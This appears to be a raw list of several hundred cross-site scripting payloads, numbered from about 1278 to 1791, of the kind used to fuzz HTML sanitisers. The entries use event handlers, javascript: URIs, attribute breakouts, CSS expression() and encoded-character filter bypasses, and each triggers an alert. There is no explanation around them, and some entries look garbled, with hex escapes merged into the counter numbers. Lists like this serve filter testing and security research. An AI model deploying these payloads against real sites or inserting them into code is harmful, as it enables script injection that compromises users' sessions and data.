- <IFRAME SRC=# onmouseover="alert(1278)"></IFRAME>
- "><h1><IFRAME SRC=# onmouseover="alert(1279)"></IFRAME>123</h1>
- "></iframe><script>alert(1280);</script><iframe frameborder="0%EF%BB%BF
- "><h1><IFRAME width="420" height="315" SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" onmouseover="alert(1281)"></IFRAME>123</h1>
- <IFRAME width="420" height="315" frameborder="0" onload="alert(1285)"></IFRAME>
- "><h1><IFRAME SRC="javascript:alert(1286);"></IFRAME>">123</h1>
- "><h1><IFRAME SRC=# onmouseover="alert(1287)"></IFRAME>123</h1>
- <IFRAME SRC="javascript:alert(1289);"></IFRAME>
- <IFRAME SRC=# onmouseover="alert(1290)"></IFRAME>
- <img src=``
 onerror=alert(1297)

- <script /**/>/**/alert(1301)/**/</script /**/
- <iframe/src="data:text/html,<svg ��load=alert(1303)>">
- <meta content="
 1304 
; JAVASCRIPT: alert(1304)" http-equiv="refresh"/>
- <form><iframe ㌶� src="javascript:alert(1311)"�㌶ ;>
- http://www.google<script .com>alert(1313)</script
- <script ^__^>alert(1317))</script ^__^
- </style ><script :-(>/**/alert(1318)/**/</script :-(
- �</form><input type"date" onfocus="alert(1319)">
- <a href="javascript:void(0)" onmouseover=
javascript:alert(1323)
>X</a>
- <script ~~~>alert(1324)</script ~~~>
- <iframe// src=javaSCRIPT:alert(1332)
- <%<!--'%><script>alert(1349);</script -->
- <script src="data:text/javascript,alert(1350)"></script>
- <iframe/onreadystatechange=alert(1352)
- <svg/onload=alert(1353)
- <input type="text" value=`` <div/onmouseover='alert(1355)'>X</div>
- http://www.<script>alert(1356)</script .com
- <svg><script ?>alert(1358)
- <img src=`xx:xx`onerror=alert(1360)>
- <meta http-equiv="refresh" content="0;javascript:alert(1362)"/>
- <script>+-+-1372-+-+alert(1372)</script>
- <body/onload=<!-->㖢alert(1373)>
- <script itworksinallbrowsers>/*<script* */alert(1374)</script
- <img src ?itworksonchrome?\/onerror = alert(1375)
- <svg><script onlypossibleinopera:-)> alert(1377)
- <script x> alert(1379) </script 1379=2
- <div/onmouseover='alert(1380)'> style="x:">
- <--`<img/src=` onerror=alert(1381)> --!>
- <div style="position:absolute;top:0;left:0;width:138300%;height:138300%" onmouseover="prompt(1383)" onclick="alert(1383)">x</button>
- <form><button formaction=javascript:alert(1385)>CLICKME
- <script\x20type="text/javascript">javascript:alert(1390);</script>
- <script\x3Etype="text/javascript">javascript:alert(1391);</script>
- <script\x0Dtype="text/javascript">javascript:alert(1392);</script>
- <script\x09type="text/javascript">javascript:alert(1393);</script>
- <script\x0Ctype="text/javascript">javascript:alert(1394);</script>
- <script\x2Ftype="text/javascript">javascript:alert(1395);</script>
- <script\x0Atype="text/javascript">javascript:alert(1396);</script>
- '`"><\x3Cscript>javascript:alert(1397)</script>
- '`"><\x00script>javascript:alert(1398)</script>
- <img src=1399 href=1399 onerror="javascript:alert(1399)"></img>
- <audio src=1400 href=1400 onerror="javascript:alert(1400)"></audio>
- <video src=1401 href=1401 onerror="javascript:alert(1401)"></video>
- <body src=1402 href=1402 onerror="javascript:alert(1402)"></body>
- <image src=1403 href=1403 onerror="javascript:alert(1403)"></image>
- <object src=1404 href=1404 onerror="javascript:alert(1404)"></object>
- <script src=1405 href=1405 onerror="javascript:alert(1405)"></script>
- <svg onResize svg onResize="javascript:javascript:alert(1406)"></svg onResize>
- <title onPropertyChange title onPropertyChange="javascript:javascript:alert(1407)"></title onPropertyChange>
- <iframe onLoad iframe onLoad="javascript:javascript:alert(1408)"></iframe onLoad>
- <body onMouseEnter body onMouseEnter="javascript:javascript:alert(1409)"></body onMouseEnter>
- <body onFocus body onFocus="javascript:javascript:alert(1410)"></body onFocus>
- <frameset onScroll frameset onScroll="javascript:javascript:alert(1411)"></frameset onScroll>
- <script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1412)"></script onReadyStateChange>
- <html onMouseUp html onMouseUp="javascript:javascript:alert(1413)"></html onMouseUp>
- <body onPropertyChange body onPropertyChange="javascript:javascript:alert(1414)"></body onPropertyChange>
- <svg onLoad svg onLoad="javascript:javascript:alert(1415)"></svg onLoad>
- <body onPageHide body onPageHide="javascript:javascript:alert(1416)"></body onPageHide>
- <body onMouseOver body onMouseOver="javascript:javascript:alert(1417)"></body onMouseOver>
- <body onUnload body onUnload="javascript:javascript:alert(1418)"></body onUnload>
- <body onLoad body onLoad="javascript:javascript:alert(1419)"></body onLoad>
- <bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1420)"></bgsound onPropertyChange>
- <html onMouseLeave html onMouseLeave="javascript:javascript:alert(1421)"></html onMouseLeave>
- <html onMouseWheel html onMouseWheel="javascript:javascript:alert(1422)"></html onMouseWheel>
- <style onLoad style onLoad="javascript:javascript:alert(1423)"></style onLoad>
- <iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1424)"></iframe onReadyStateChange>
- <body onPageShow body onPageShow="javascript:javascript:alert(1425)"></body onPageShow>
- <style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1426)"></style onReadyStateChange>
- <frameset onFocus frameset onFocus="javascript:javascript:alert(1427)"></frameset onFocus>
- <applet onError applet onError="javascript:javascript:alert(1428)"></applet onError>
- <marquee onStart marquee onStart="javascript:javascript:alert(1429)"></marquee onStart>
- <script onLoad script onLoad="javascript:javascript:alert(1430)"></script onLoad>
- <html onMouseOver html onMouseOver="javascript:javascript:alert(1431)"></html onMouseOver>
- <html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1432)"></html onMouseEnter>
- <body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1433)"></body onBeforeUnload>
- <html onMouseDown html onMouseDown="javascript:javascript:alert(1434)"></html onMouseDown>
- <marquee onScroll marquee onScroll="javascript:javascript:alert(1435)"></marquee onScroll>
- <xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1436)"></xml onPropertyChange>
- <frameset onBlur frameset onBlur="javascript:javascript:alert(1437)"></frameset onBlur>
- <applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1438)"></applet onReadyStateChange>
- <svg onUnload svg onUnload="javascript:javascript:alert(1439)"></svg onUnload>
- <html onMouseOut html onMouseOut="javascript:javascript:alert(1440)"></html onMouseOut>
- <body onMouseMove body onMouseMove="javascript:javascript:alert(1441)"></body onMouseMove>
- <body onResize body onResize="javascript:javascript:alert(1442)"></body onResize>
- <object onError object onError="javascript:javascript:alert(1443)"></object onError>
- <body onPopState body onPopState="javascript:javascript:alert(1444)"></body onPopState>
- <html onMouseMove html onMouseMove="javascript:javascript:alert(1445)"></html onMouseMove>
- <applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1446)"></applet onreadystatechange>
- <body onpagehide body onpagehide="javascript:javascript:alert(1447)"></body onpagehide>
- <svg onunload svg onunload="javascript:javascript:alert(1448)"></svg onunload>
- <applet onerror applet onerror="javascript:javascript:alert(1449)"></applet onerror>
- <body onkeyup body onkeyup="javascript:javascript:alert(1450)"></body onkeyup>
- <body onunload body onunload="javascript:javascript:alert(1451)"></body onunload>
- <iframe onload iframe onload="javascript:javascript:alert(1452)"></iframe onload>
- <body onload body onload="javascript:javascript:alert(1453)"></body onload>
- <html onmouseover html onmouseover="javascript:javascript:alert(1454)"></html onmouseover>
- <object onbeforeload object onbeforeload="javascript:javascript:alert(1455)"></object onbeforeload>
- <body onbeforeunload body onbeforeunload="javascript:javascript:alert(1456)"></body onbeforeunload>
- <body onfocus body onfocus="javascript:javascript:alert(1457)"></body onfocus>
- <body onkeydown body onkeydown="javascript:javascript:alert(1458)"></body onkeydown>
- <iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1459)"></iframe onbeforeload>
- <iframe src iframe src="javascript:javascript:alert(1460)"></iframe src>
- <svg onload svg onload="javascript:javascript:alert(1461)"></svg onload>
- <html onmousemove html onmousemove="javascript:javascript:alert(1462)"></html onmousemove>
- <body onblur body onblur="javascript:javascript:alert(1463)"></body onblur>
- \x3Cscript>javascript:alert(1464)</script>
- '"`><script>/* *\x2Fjavascript:alert(1465)// */</script>
- <script>javascript:alert(1466)</script\x0D
- <script>javascript:alert(1467)</script\x0A
- <script>javascript:alert(1468)</script\x0B
- <script charset="\x22>javascript:alert(1469)</script>
- <!--\x3E<img src=xxx:x onerror=javascript:alert(1470)> -->
- --><!-- ---> <img src=xxx:x onerror=javascript:alert(1471)> -->
- --><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1472)> -->
- --><!-- --\x21473> <img src=xxx:x onerror=javascript:alert(1473)> -->
- --><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1474)> -->
- `"'><img src='#\x27 onerror=javascript:alert(1475)>
- <a href="javascript\x3Ajavascript:alert(1476)" id="fuzzelement1476">test</a>
- "'`><p><svg><script>a='hello\x27;javascript:alert(1477)//';</script></p>
- <a href="javas\x00cript:javascript:alert(1478)" id="fuzzelement1478">test</a>
- <a href="javas\x07cript:javascript:alert(1479)" id="fuzzelement1479">test</a>
- <a href="javas\x0Dcript:javascript:alert(1480)" id="fuzzelement1480">test</a>
- <a href="javas\x0Acript:javascript:alert(1481)" id="fuzzelement1481">test</a>
- <a href="javas\x08cript:javascript:alert(1482)" id="fuzzelement1482">test</a>
- <a href="javas\x02cript:javascript:alert(1483)" id="fuzzelement1483">test</a>
- <a href="javas\x03cript:javascript:alert(1484)" id="fuzzelement1484">test</a>
- <a href="javas\x04cript:javascript:alert(1485)" id="fuzzelement1485">test</a>
- <a href="javas\x01486cript:javascript:alert(1486)" id="fuzzelement1486">test</a>
- <a href="javas\x05cript:javascript:alert(1487)" id="fuzzelement1487">test</a>
- <a href="javas\x0Bcript:javascript:alert(1488)" id="fuzzelement1488">test</a>
- <a href="javas\x09cript:javascript:alert(1489)" id="fuzzelement1489">test</a>
- <a href="javas\x06cript:javascript:alert(1490)" id="fuzzelement1490">test</a>
- <a href="javas\x0Ccript:javascript:alert(1491)" id="fuzzelement1491">test</a>
- <script>/* *\x2A/javascript:alert(1492)// */</script>
- <script>/* *\x00/javascript:alert(1493)// */</script>
- <style></style\x3E<img src="about:blank" onerror=javascript:alert(1494)//></style>
- <style></style\x0D<img src="about:blank" onerror=javascript:alert(1495)//></style>
- <style></style\x09<img src="about:blank" onerror=javascript:alert(1496)//></style>
- <style></style\x20<img src="about:blank" onerror=javascript:alert(1497)//></style>
- <style></style\x0A<img src="about:blank" onerror=javascript:alert(1498)//></style>
- "'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1499);/*';">DEF
- "'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1500);/*';">DEF
- <script>if("x\\xE1501\x96\x89".length==2) { javascript:alert(1501);}</script>
- <script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1502);}</script>
- <script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1503);}</script>
- '`"><\x3Cscript>javascript:alert(1504)</script>
- '`"><\x00script>javascript:alert(1505)</script>
- "'`><\x3Cimg src=xxx:x onerror=javascript:alert(1506)>
- "'`><\x00img src=xxx:x onerror=javascript:alert(1507)>
- <script src="data:text/plain\x2Cjavascript:alert(1508)"></script>
- <script src="data:\xD4\x8F,javascript:alert(1509)"></script>
- <script src="data:\xE0\xA4\x98,javascript:alert(1510)"></script>
- <script src="data:\xCB\x8F,javascript:alert(1511)"></script>
- <script\x20type="text/javascript">javascript:alert(1512);</script>
- <script\x3Etype="text/javascript">javascript:alert(1513);</script>
- <script\x0Dtype="text/javascript">javascript:alert(1514);</script>
- <script\x09type="text/javascript">javascript:alert(1515);</script>
- <script\x0Ctype="text/javascript">javascript:alert(1516);</script>
- <script\x2Ftype="text/javascript">javascript:alert(1517);</script>
- <script\x0Atype="text/javascript">javascript:alert(1518);</script>
- ABC<div style="x\x3Aexpression(javascript:alert(1519)">DEF
- ABC<div style="x:expression\x5C(javascript:alert(1520)">DEF
- ABC<div style="x:expression\x00(javascript:alert(1521)">DEF
- ABC<div style="x:exp\x00ression(javascript:alert(1522)">DEF
- ABC<div style="x:exp\x5Cression(javascript:alert(1523)">DEF
- ABC<div style="x:\x0Aexpression(javascript:alert(1524)">DEF
- ABC<div style="x:\x09expression(javascript:alert(1525)">DEF
- ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1526)">DEF
- ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1527)">DEF
- ABC<div style="x:\xC2\xA0expression(javascript:alert(1528)">DEF
- ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1529)">DEF
- ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1530)">DEF
- ABC<div style="x:\x0Dexpression(javascript:alert(1531)">DEF
- ABC<div style="x:\x0Cexpression(javascript:alert(1532)">DEF
- ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1533)">DEF
- ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1534)">DEF
- ABC<div style="x:\x20expression(javascript:alert(1535)">DEF
- ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1536)">DEF
- ABC<div style="x:\x00expression(javascript:alert(1537)">DEF
- ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1538)">DEF
- ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1539)">DEF
- ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1540)">DEF
- ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1541)">DEF
- ABC<div style="x:\x0Bexpression(javascript:alert(1542)">DEF
- ABC<div style="x:\xE2\x80\x81543expression(javascript:alert(1543)">DEF
- ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1544)">DEF
- ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1545)">DEF
- <a href="\x0Bjavascript:javascript:alert(1546)" id="fuzzelement1546">test</a>
- <a href="\x0Fjavascript:javascript:alert(1547)" id="fuzzelement1547">test</a>
- <a href="\xC2\xA0javascript:javascript:alert(1548)" id="fuzzelement1548">test</a>
- <a href="\x05javascript:javascript:alert(1549)" id="fuzzelement1549">test</a>
- <a href="\xE1550\xA0\x8Ejavascript:javascript:alert(1550)" id="fuzzelement1550">test</a>
- <a href="\x15518javascript:javascript:alert(1551)" id="fuzzelement1551">test</a>
- <a href="\x15521552javascript:javascript:alert(1552)" id="fuzzelement1552">test</a>
- <a href="\xE2\x80\x88javascript:javascript:alert(1553)" id="fuzzelement1553">test</a>
- <a href="\xE2\x80\x89javascript:javascript:alert(1554)" id="fuzzelement1554">test</a>
- <a href="\xE2\x80\x80javascript:javascript:alert(1555)" id="fuzzelement1555">test</a>
- <a href="\x15567javascript:javascript:alert(1556)" id="fuzzelement1556">test</a>
- <a href="\x03javascript:javascript:alert(1557)" id="fuzzelement1557">test</a>
- <a href="\x0Ejavascript:javascript:alert(1558)" id="fuzzelement1558">test</a>
- <a href="\x1559Ajavascript:javascript:alert(1559)" id="fuzzelement1559">test</a>
- <a href="\x00javascript:javascript:alert(1560)" id="fuzzelement1560">test</a>
- <a href="\x15610javascript:javascript:alert(1561)" id="fuzzelement1561">test</a>
- <a href="\xE2\x80\x82javascript:javascript:alert(1562)" id="fuzzelement1562">test</a>
- <a href="\x20javascript:javascript:alert(1563)" id="fuzzelement1563">test</a>
- <a href="\x15643javascript:javascript:alert(1564)" id="fuzzelement1564">test</a>
- <a href="\x09javascript:javascript:alert(1565)" id="fuzzelement1565">test</a>
- <a href="\xE2\x80\x8Ajavascript:javascript:alert(1566)" id="fuzzelement1566">test</a>
- <a href="\x15674javascript:javascript:alert(1567)" id="fuzzelement1567">test</a>
- <a href="\x15689javascript:javascript:alert(1568)" id="fuzzelement1568">test</a>
- <a href="\xE2\x80\xAFjavascript:javascript:alert(1569)" id="fuzzelement1569">test</a>
- <a href="\x1570Fjavascript:javascript:alert(1570)" id="fuzzelement1570">test</a>
- <a href="\xE2\x80\x81571javascript:javascript:alert(1571)" id="fuzzelement1571">test</a>
- <a href="\x1572Djavascript:javascript:alert(1572)" id="fuzzelement1572">test</a>
- <a href="\xE2\x80\x87javascript:javascript:alert(1573)" id="fuzzelement1573">test</a>
- <a href="\x07javascript:javascript:alert(1574)" id="fuzzelement1574">test</a>
- <a href="\xE1575\x9A\x80javascript:javascript:alert(1575)" id="fuzzelement1575">test</a>
- <a href="\xE2\x80\x83javascript:javascript:alert(1576)" id="fuzzelement1576">test</a>
- <a href="\x04javascript:javascript:alert(1577)" id="fuzzelement1577">test</a>
- <a href="\x01578javascript:javascript:alert(1578)" id="fuzzelement1578">test</a>
- <a href="\x08javascript:javascript:alert(1579)" id="fuzzelement1579">test</a>
- <a href="\xE2\x80\x84javascript:javascript:alert(1580)" id="fuzzelement1580">test</a>
- <a href="\xE2\x80\x86javascript:javascript:alert(1581)" id="fuzzelement1581">test</a>
- <a href="\xE3\x80\x80javascript:javascript:alert(1582)" id="fuzzelement1582">test</a>
- <a href="\x15832javascript:javascript:alert(1583)" id="fuzzelement1583">test</a>
- <a href="\x0Djavascript:javascript:alert(1584)" id="fuzzelement1584">test</a>
- <a href="\x0Ajavascript:javascript:alert(1585)" id="fuzzelement1585">test</a>
- <a href="\x0Cjavascript:javascript:alert(1586)" id="fuzzelement1586">test</a>
- <a href="\x15875javascript:javascript:alert(1587)" id="fuzzelement1587">test</a>
- <a href="\xE2\x80\xA8javascript:javascript:alert(1588)" id="fuzzelement1588">test</a>
- <a href="\x15896javascript:javascript:alert(1589)" id="fuzzelement1589">test</a>
- <a href="\x02javascript:javascript:alert(1590)" id="fuzzelement1590">test</a>
- <a href="\x1591Bjavascript:javascript:alert(1591)" id="fuzzelement1591">test</a>
- <a href="\x06javascript:javascript:alert(1592)" id="fuzzelement1592">test</a>
- <a href="\xE2\x80\xA9javascript:javascript:alert(1593)" id="fuzzelement1593">test</a>
- <a href="\xE2\x80\x85javascript:javascript:alert(1594)" id="fuzzelement1594">test</a>
- <a href="\x1595Ejavascript:javascript:alert(1595)" id="fuzzelement1595">test</a>
- <a href="\xE2\x81596\x9Fjavascript:javascript:alert(1596)" id="fuzzelement1596">test</a>
- <a href="\x1597Cjavascript:javascript:alert(1597)" id="fuzzelement1597">test</a>
- <a href="javascript\x00:javascript:alert(1598)" id="fuzzelement1598">test</a>
- <a href="javascript\x3A:javascript:alert(1599)" id="fuzzelement1599">test</a>
- <a href="javascript\x09:javascript:alert(1600)" id="fuzzelement1600">test</a>
- <a href="javascript\x0D:javascript:alert(1601)" id="fuzzelement1601">test</a>
- <a href="javascript\x0A:javascript:alert(1602)" id="fuzzelement1602">test</a>
- `"'><img src=xxx:x \x0Aonerror=javascript:alert(1603)>
- `"'><img src=xxx:x \x22onerror=javascript:alert(1604)>
- `"'><img src=xxx:x \x0Bonerror=javascript:alert(1605)>
- `"'><img src=xxx:x \x0Donerror=javascript:alert(1606)>
- `"'><img src=xxx:x \x2Fonerror=javascript:alert(1607)>
- `"'><img src=xxx:x \x09onerror=javascript:alert(1608)>
- `"'><img src=xxx:x \x0Conerror=javascript:alert(1609)>
- `"'><img src=xxx:x \x00onerror=javascript:alert(1610)>
- `"'><img src=xxx:x \x27onerror=javascript:alert(1611)>
- `"'><img src=xxx:x \x20onerror=javascript:alert(1612)>
- "`'><script>\x3Bjavascript:alert(1613)</script>
- "`'><script>\x0Djavascript:alert(1614)</script>
- "`'><script>\xEF\xBB\xBFjavascript:alert(1615)</script>
- "`'><script>\xE2\x80\x81616javascript:alert(1616)</script>
- "`'><script>\xE2\x80\x84javascript:alert(1617)</script>
- "`'><script>\xE3\x80\x80javascript:alert(1618)</script>
- "`'><script>\x09javascript:alert(1619)</script>
- "`'><script>\xE2\x80\x89javascript:alert(1620)</script>
- "`'><script>\xE2\x80\x85javascript:alert(1621)</script>
- "`'><script>\xE2\x80\x88javascript:alert(1622)</script>
- "`'><script>\x00javascript:alert(1623)</script>
- "`'><script>\xE2\x80\xA8javascript:alert(1624)</script>
- "`'><script>\xE2\x80\x8Ajavascript:alert(1625)</script>
- "`'><script>\xE1626\x9A\x80javascript:alert(1626)</script>
- "`'><script>\x0Cjavascript:alert(1627)</script>
- "`'><script>\x2Bjavascript:alert(1628)</script>
- "`'><script>\xF0\x90\x96\x9Ajavascript:alert(1629)</script>
- "`'><script>-javascript:alert(1630)</script>
- "`'><script>\x0Ajavascript:alert(1631)</script>
- "`'><script>\xE2\x80\xAFjavascript:alert(1632)</script>
- "`'><script>\x7Ejavascript:alert(1633)</script>
- "`'><script>\xE2\x80\x87javascript:alert(1634)</script>
- "`'><script>\xE2\x81635\x9Fjavascript:alert(1635)</script>
- "`'><script>\xE2\x80\xA9javascript:alert(1636)</script>
- "`'><script>\xC2\x85javascript:alert(1637)</script>
- "`'><script>\xEF\xBF\xAEjavascript:alert(1638)</script>
- "`'><script>\xE2\x80\x83javascript:alert(1639)</script>
- "`'><script>\xE2\x80\x8Bjavascript:alert(1640)</script>
- "`'><script>\xEF\xBF\xBEjavascript:alert(1641)</script>
- "`'><script>\xE2\x80\x80javascript:alert(1642)</script>
- "`'><script>\x21643javascript:alert(1643)</script>
- "`'><script>\xE2\x80\x82javascript:alert(1644)</script>
- "`'><script>\xE2\x80\x86javascript:alert(1645)</script>
- "`'><script>\xE1646\xA0\x8Ejavascript:alert(1646)</script>
- "`'><script>\x0Bjavascript:alert(1647)</script>
- "`'><script>\x20javascript:alert(1648)</script>
- "`'><script>\xC2\xA0javascript:alert(1649)</script>
- "/><img/onerror=\x0Bjavascript:alert(1650)\x0Bsrc=xxx:x />
- "/><img/onerror=\x22javascript:alert(1651)\x22src=xxx:x />
- "/><img/onerror=\x09javascript:alert(1652)\x09src=xxx:x />
- "/><img/onerror=\x27javascript:alert(1653)\x27src=xxx:x />
- "/><img/onerror=\x0Ajavascript:alert(1654)\x0Asrc=xxx:x />
- "/><img/onerror=\x0Cjavascript:alert(1655)\x0Csrc=xxx:x />
- "/><img/onerror=\x0Djavascript:alert(1656)\x0Dsrc=xxx:x />
- "/><img/onerror=\x60javascript:alert(1657)\x60src=xxx:x />
- "/><img/onerror=\x20javascript:alert(1658)\x20src=xxx:x />
- <script\x2F>javascript:alert(1659)</script>
- <script\x20>javascript:alert(1660)</script>
- <script\x0D>javascript:alert(1661)</script>
- <script\x0A>javascript:alert(1662)</script>
- <script\x0C>javascript:alert(1663)</script>
- <script\x00>javascript:alert(1664)</script>
- <script\x09>javascript:alert(1665)</script>
- "><img src=x onerror=javascript:alert(1666)>
- "><img src=x onerror=javascript:alert(1667)>
- "><img src=x onerror=javascript:alert(1668)>
- "><img src=x onerror=javascript:alert(1669)>
- "><img src=x onerror=javascript:alert(1670))>
- "><img src=x onerror=javascript:alert(1671))>
- "><img src=x onerror=javascript:alert(1672))>
- "><img src=x onerror=javascript:alert(1673)>
- "><img src=x onerror=javascript:alert(1674))>
- "><img src=x onerror=javascript:alert(1675))>
- "><img src=x onerror=javascript:alert(1676)>
- "><img src=x onerror=javascript:alert(1677))>
- "><img src=x onerror=javascript:alert(1678)>
- "><img src=x onerror=javascript:alert(1679))>
- "><img src=x onerror=javascript:alert(1680)>
- `"'><img src=xxx:x onerror\x0B=javascript:alert(1681)>
- `"'><img src=xxx:x onerror\x00=javascript:alert(1682)>
- `"'><img src=xxx:x onerror\x0C=javascript:alert(1683)>
- `"'><img src=xxx:x onerror\x0D=javascript:alert(1684)>
- `"'><img src=xxx:x onerror\x20=javascript:alert(1685)>
- `"'><img src=xxx:x onerror\x0A=javascript:alert(1686)>
- `"'><img src=xxx:x onerror\x09=javascript:alert(1687)>
- <script>javascript:alert(1688)<\x00/script>
- <img src=# onerror\x3D"javascript:alert(1689)" >
- <input onfocus=javascript:alert(1690) autofocus>
- <input onblur=javascript:alert(1691) autofocus><input autofocus>
- <video poster=javascript:javascript:alert(1692)//
- <body onscroll=javascript:alert(1693)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
- <form id=test onforminput=javascript:alert(1694)><input></form><button form=test onformchange=javascript:alert(1694)>X
- <video><source onerror="javascript:javascript:alert(1695)">
- <video onerror="javascript:javascript:alert(1696)"><source>
- <form><button formaction="javascript:javascript:alert(1697)">X
- <body oninput=javascript:alert(1698)><input autofocus>
- <math href="javascript:javascript:alert(1699)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1699)">CLICKME</maction> </math>
- <frameset onload=javascript:alert(1700)>
- <table background="javascript:javascript:alert(1701)">
- <!--<img src="--><img src=x onerror=javascript:alert(1702)//">
- <comment><img src="</comment><img src=x onerror=javascript:alert(1703))//">
- <![><img src="]><img src=x onerror=javascript:alert(1704)//">
- <style><img src="</style><img src=x onerror=javascript:alert(1705)//">
- <li style=list-style:url() onerror=javascript:alert(1706)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1706)></div>
- <head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1707)//#">XXX</a></body>
- <SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1708)</SCRIPT>
- <OBJECT CLASSID="clsid:333C7BC4-460F-17091709D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1709)"></OBJECT>
- <b <script>alert(1712)</script>0
- <div id="div1713"><input value="``onmouseover=javascript:alert(1713)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1713").innerHTML;</script>
- <x '="foo"><x foo='><img src=x onerror=javascript:alert(1714)//'>
- <embed src="javascript:alert(1715)">
- <img src="javascript:alert(1716)">
- <image src="javascript:alert(1717)">
- <script src="javascript:alert(1718)">
- <div style=width:1719px;filter:glow onfilterchange=javascript:alert(1719)>x
- <? foo="><script>javascript:alert(1720)</script>">
- <! foo="><script>javascript:alert(1721)</script>">
- </ foo="><script>javascript:alert(1722)</script>">
- <? foo="><x foo='?><script>javascript:alert(1723)</script>'>">
- <! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1724)</script>">
- <% foo><x foo="%><script>javascript:alert(1725)</script>">
- <div id=d><x xmlns="><iframe onload=javascript:alert(1726)"></div> <script>d.innerHTML=d.innerHTML</script>
- <img \x00src=x onerror="alert(1727)">
- <img \x47src=x onerror="javascript:alert(1728)">
- <img \x17291729src=x onerror="javascript:alert(1729)">
- <img \x17302src=x onerror="javascript:alert(1730)">
- <img\x47src=x onerror="javascript:alert(1731)">
- <img\x17320src=x onerror="javascript:alert(1732)">
- <img\x17333src=x onerror="javascript:alert(1733)">
- <img\x32src=x onerror="javascript:alert(1734)">
- <img\x47src=x onerror="javascript:alert(1735)">
- <img\x17361736src=x onerror="javascript:alert(1736)">
- <img \x47src=x onerror="javascript:alert(1737)">
- <img \x34src=x onerror="javascript:alert(1738)">
- <img \x39src=x onerror="javascript:alert(1739)">
- <img \x00src=x onerror="javascript:alert(1740)">
- <img src\x09=x onerror="javascript:alert(1741)">
- <img src\x17420=x onerror="javascript:alert(1742)">
- <img src\x17433=x onerror="javascript:alert(1743)">
- <img src\x32=x onerror="javascript:alert(1744)">
- <img src\x17452=x onerror="javascript:alert(1745)">
- <img src\x17461746=x onerror="javascript:alert(1746)">
- <img src\x00=x onerror="javascript:alert(1747)">
- <img src\x47=x onerror="javascript:alert(1748)">
- <img src=x\x09onerror="javascript:alert(1749)">
- <img src=x\x17500onerror="javascript:alert(1750)">
- <img src=x\x17511751onerror="javascript:alert(1751)">
- <img src=x\x17522onerror="javascript:alert(1752)">
- <img src=x\x17533onerror="javascript:alert(1753)">
- <img[a][b][c]src[d]=x[e]onerror=[f]"alert(1754)">
- <img src=x onerror=\x09"javascript:alert(1755)">
- <img src=x onerror=\x17560"javascript:alert(1756)">
- <img src=x onerror=\x17571757"javascript:alert(1757)">
- <img src=x onerror=\x17582"javascript:alert(1758)">
- <img src=x onerror=\x32"javascript:alert(1759)">
- <img src=x onerror=\x00"javascript:alert(1760)">
- <a href=javaۡ�䓌script:javascript:alert(1761)>XXX</a>
- <img src="x` `<script>javascript:alert(1762)</script>"` `>
- <img src onerror /" '"= alt=javascript:alert(1763)//">
- <title onpropertychange=javascript:alert(1764)></title><title title=>
- <a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1765)></a>">
- <!--[if]><script>javascript:alert(1766)</script -->
- <!--[if<img src=x onerror=javascript:alert(1767)//]> -->
- <object id="x" classid="clsid:CB927D17702-4FF7-4a9e-A177069-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17707-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1770)" style="behavior:url(#x);"><param name=postdomevents /></object>
- <a style="-o-link:'javascript:javascript:alert(1771)';-o-link-source:current">X
- <style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1772)'}{}*{-o-link-source:current}]{color:red};</style>
- <link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1773))%7d
- <style>@import "data:,*%7bx:expression(javascript:alert(1774))%7D";</style>
- <a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1775);">XXX</a></a><a href="javascript:javascript:alert(1775)">XXX</a>
- <// style=x:expression\28javascript:alert(1779)\29>
- <style>*{x:expression(javascript:alert(1780))}</style>
- <div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1782));">X
- <script>({set/**/$($){_/**/setter=$,_=javascript:alert(1788)}}).$=eval</script>
- <script>({0:#0=eval/#0#/#0#(javascript:alert(1789))})</script>
- <script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1790)}),x</script>
- <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1791)')()</script>
